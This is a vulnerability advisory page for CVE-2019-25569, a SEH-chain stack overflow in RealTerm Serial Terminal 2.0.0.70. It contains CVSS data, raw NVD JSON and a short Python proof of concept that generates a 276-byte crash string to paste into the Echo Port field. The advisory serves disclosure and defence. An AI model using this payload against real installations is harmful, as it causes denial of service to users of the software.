Security Vulnerability Report
CVE-2019-25569 CVSS 6.2 MEDIUM

CVE-2019-25569

Published: 2026-03-21 13:16:21
Last Modified: 2026-03-24 20:43:06

Description

RealTerm Serial Terminal 2.0.0.70 contains a stack-based buffer overflow vulnerability in the Echo Port field that allows local attackers to crash the application by triggering a structured exception handler (SEH) chain corruption. Attackers can craft a malicious input string with 268 bytes of padding followed by SEH overwrite values and paste it into the Port field to cause denial of service.

CVSS Details

CVSS Score: 6.2
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:crun:realterm:2.0.0.70:*:*:*:*:*:*:* - VULNERABLE
RealTerm Serial Terminal 2.0.0.70

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import sys

# PoC for CVE-2019-25569: RealTerm Serial Terminal SEH Overflow
# This script generates a malicious string to crash the application.

def generate_payload():
    # Padding to reach the SEH structure (268 bytes)
    padding = b"A" * 268
    # Overwriting the Next SEH and SE Handler addresses
    # Using 'BBBB' for nSEH and 'CCCC' for SEH to demonstrate the crash
    nseh = b"BBBB"
    seh = b"CCCC"
    # Combine the parts to form the payload
    payload = padding + nseh + seh
    return payload

if __name__ == "__main__":
    payload = generate_payload()
    print(f"[*] Payload length: {len(payload)}")
    print(f"[*] Copy the following string and paste it into the 'Echo Port' field:")
    print(payload.decode('latin-1'))

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2019-25569", "sourceIdentifier": "[email protected]", "published": "2026-03-21T13:16:20.653", "lastModified": "2026-03-24T20:43:05.600", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "RealTerm Serial Terminal 2.0.0.70 contains a stack-based buffer overflow vulnerability in the Echo Port field that allows local attackers to crash the application by triggering a structured exception handler (SEH) chain corruption. Attackers can craft a malicious input string with 268 bytes of padding followed by SEH overwrite values and paste it into the Port field to cause denial of service."}, {"lang": "es", "value": "RealTerm Serial Terminal 2.0.0.70 contiene una vulnerabilidad de desbordamiento de búfer basado en pila en el campo Echo Port que permite a atacantes locales bloquear la aplicación al desencadenar una corrupción de la cadena de gestores de excepciones estructuradas (SEH). Los atacantes pueden crear una cadena de entrada maliciosa con 268 bytes de relleno seguida de valores de sobrescritura de SEH y pegarla en el campo Port para causar denegación de servicio."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 6.9, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", 
"modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 6.2, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.5, "impactScore": 3.6}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-787"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:crun:realterm:2.0.0.70:*:*:*:*:*:*:*", "matchCriteriaId": "CBB4049D-EE6D-4CA8-B20B-5F32A28157EE"}]}]}], 
"references": [{"url": "https://realterm.sourceforge.io/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://sourceforge.net/projects/realterm/files/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.exploit-db.com/exploits/46391", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory", "VDB Entry"]}, {"url": "https://www.vulncheck.com/advisories/realterm-serial-terminal-seh-overflow-crash", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}